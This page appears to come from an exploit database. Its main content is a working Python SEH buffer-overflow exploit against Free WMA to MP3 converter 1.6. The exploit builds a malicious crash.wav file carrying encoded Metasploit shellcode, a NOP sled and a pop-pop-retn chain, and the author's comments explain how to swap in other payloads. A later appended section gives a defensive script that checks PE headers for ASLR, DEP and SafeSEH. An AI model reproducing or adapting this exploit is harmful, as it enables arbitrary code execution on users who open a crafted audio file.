0day.today - Biggest Exploit Database in the World.
Free WMA to MP3 converter v1.6 - Local buffer overflow (SEH)
#!/usr/bin/python -w
# In the name of allah
# Title : Local buffer overflow - SEH
# Infected program: [Free WMA to MP3 converter 1.6]
# Date: 30/11/2012
# Exploit Author: [R3ZN0V]
# Software : [www.eusing.com]
# Download Link: [http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm]
# OS's: [Windows xp sp3 , Windows 7 64bit sp1 and 32bit]
# References : http://www.1337day.com/exploit/17433
#=====================================================================================#
# First, I'd like to thank b33f for all his cooperation (always the best man ;) ).
# I suffered so much until I made this a working exploit, as well as a few problems with
# badchars analyzing and executing my shellcode, which is inside the memory after
# tracing badchars. If you looked deeply at the path you'll see a weird thing:
# two bytes of 0D will be added automatically like this:
# 09 (0D) 0A 0B 0C (0D). I've no idea what caused that; the first 0D is the problem.
# Probably like a null byte. However, go to metasploit and figure this out by badchars
# analyzing, and try to replace the shell with another one using this command:
# msfencode -b '\x00\x0a' , obviously it won't work.
#=====================================================================================#

file = "crash.wav"

# windows/exec CMD=calc.exe EXITFUNC=seh R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -t c
# <========= 227 byte iteration=1 =========>
shell = ("\xda\xc6\xd9\x74\x24\xf4\x5f\xb8\xc2\x0f\x5e\x65\x33\xc9\xb1"
"\x33\x31\x47\x17\x83\xc7\x04\x03\x85\x1c\xbc\x90\xf5\xcb\xc9"
"\x5b\x05\x0c\xaa\xd2\xe0\x3d\xf8\x81\x61\x6f\xcc\xc2\x27\x9c"
"\xa7\x87\xd3\x17\xc5\x0f\xd4\x90\x60\x76\xdb\x21\x45\xb6\xb7"
"\xe2\xc7\x4a\xc5\x36\x28\x72\x06\x4b\x29\xb3\x7a\xa4\x7b\x6c"
"\xf1\x17\x6c\x19\x47\xa4\x8d\xcd\xcc\x94\xf5\x68\x12\x60\x4c"
"\x72\x42\xd9\xdb\x3c\x7a\x51\x83\x9c\x7b\xb6\xd7\xe1\x32\xb3"
"\x2c\x91\xc5\x15\x7d\x5a\xf4\x59\xd2\x65\x39\x54\x2a\xa1\xfd"
"\x87\x59\xd9\xfe\x3a\x5a\x1a\x7d\xe1\xef\xbf\x25\x62\x57\x64"
"\xd4\xa7\x0e\xef\xda\x0c\x44\xb7\xfe\x93\x89\xc3\xfa\x18\x2c"
"\x04\x8b\x5b\x0b\x80\xd0\x38\x32\x91\xbc\xef\x4b\xc1\x18\x4f"
"\xee\x89\x8a\x84\x88\xd3\xc0\x5b\x18\x6e\xad\x5c\x22\x71\x9d"
"\x34\x13\xfa\x72\x42\xac\x29\x37\xb2\x5d\xe0\xad\x23\xc4\x91"
"\x8c\x29\xf7\x4f\xd2\x57\x74\x7a\xaa\xa3\x64\x0f\xaf\xe8\x22"
"\xe3\xdd\x61\xc7\x03\x72\x81\xc2\x67\x15\x11\x8e\x49\xb0\x91"
"\x35\x96")

evil = "\x90" * 11 + shell      # don't shrink these nops or the exploit wouldn't work, just in case you replaced the shellcode
junk1 = "\xEB\x06\x90\x90"      # jmp 4 byte to far jmp
junk2 = "\x56\x23\x40\x00"      # pop pop retn Wmpcon.exe Rebase=false , aslr=false , seh=unsafe os=false
junk3 = "\xE9\xEA\xEF\xFF\xFF"  # jmp back 4108 byte to the beginning of our buffer
junk4 = "C"*50

buffer = evil + "\x41"*(4116-len(evil)) + junk1 + junk2 + junk3 + junk4

text = open(file, "w")
text.write(buffer)
text.close()

print "\t\n The file has been created :) "

# 0day.today [2024-11-15] #
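
The `junk2` comment records that the module supplying the handler address was built with `Rebase=false , aslr=false , seh=unsafe`. The following Python 3 example is added here for defenders auditing binaries they build or deploy; it is not part of the original exploit or of any tool the author mentions, and it reads those opt-ins from a PE header. The names `pe_mitigations`, `findings` and `sample_pe32` are hypothetical, and the sample headers are constructed for the demo.

```python
import struct

# DllCharacteristics bits from the PE/COFF specification
DYNAMIC_BASE, NX_COMPAT, NO_SEH = 0x0040, 0x0100, 0x0400

def pe_mitigations(image: bytes) -> dict:
    """Read the exploit-mitigation opt-ins from a PE image's headers."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    (pe_off,) = struct.unpack_from("<I", image, 0x3C)      # e_lfanew
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    opt = pe_off + 24                  # 4-byte signature + 20-byte COFF header
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (0x10B, 0x20B):    # PE32 / PE32+
        raise ValueError("unknown optional-header magic")
    (flags,) = struct.unpack_from("<H", image, opt + 70)   # DllCharacteristics
    dirs = opt + (96 if magic == 0x10B else 112)           # data directories
    (ndirs,) = struct.unpack_from("<I", image, dirs - 4)   # NumberOfRvaAndSizes
    # Directory entry 10 is the load configuration directory (8 bytes per entry).
    load_cfg = struct.unpack_from("<I", image, dirs + 80)[0] if ndirs > 10 else 0
    return {"pe32": magic == 0x10B, "aslr": bool(flags & DYNAMIC_BASE),
            "dep": bool(flags & NX_COMPAT), "no_seh": bool(flags & NO_SEH),
            "load_config": load_cfg != 0}

def findings(m: dict) -> list:
    """Missing opt-ins relevant to SEH-overwrite bugs (header checks only)."""
    out = []
    if not m["aslr"]:
        out.append("ASLR (/DYNAMICBASE) not enabled")
    if not m["dep"]:
        out.append("DEP (/NXCOMPAT) not enabled")
    # The SafeSEH handler table is referenced from the load-config directory,
    # so a 32-bit image without one cannot have its handlers validated.
    if m["pe32"] and not (m["no_seh"] or m["load_config"]):
        out.append("no load-config directory, so no SafeSEH table")
    return out

def sample_pe32(flags: int, load_cfg_rva: int) -> bytes:
    """Constructed PE32 headers for the demo (not a real program)."""
    img, opt = bytearray(0x40 + 24 + 96 + 16 * 8), 0x40 + 24
    img[:2], img[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", img, 0x3C, 0x40)             # e_lfanew
    struct.pack_into("<H", img, opt, 0x10B)             # PE32 magic
    struct.pack_into("<H", img, opt + 70, flags)        # DllCharacteristics
    struct.pack_into("<I", img, opt + 92, 16)           # NumberOfRvaAndSizes
    struct.pack_into("<I", img, opt + 96 + 80, load_cfg_rva)
    return bytes(img)

if __name__ == "__main__":
    print(findings(pe_mitigations(sample_pe32(0, 0))))
```

On a real file, pass the first few kilobytes read in binary mode. A load-config directory that is present can still carry an empty handler table, so an empty findings list for SafeSEH means only that the header-level precondition is met.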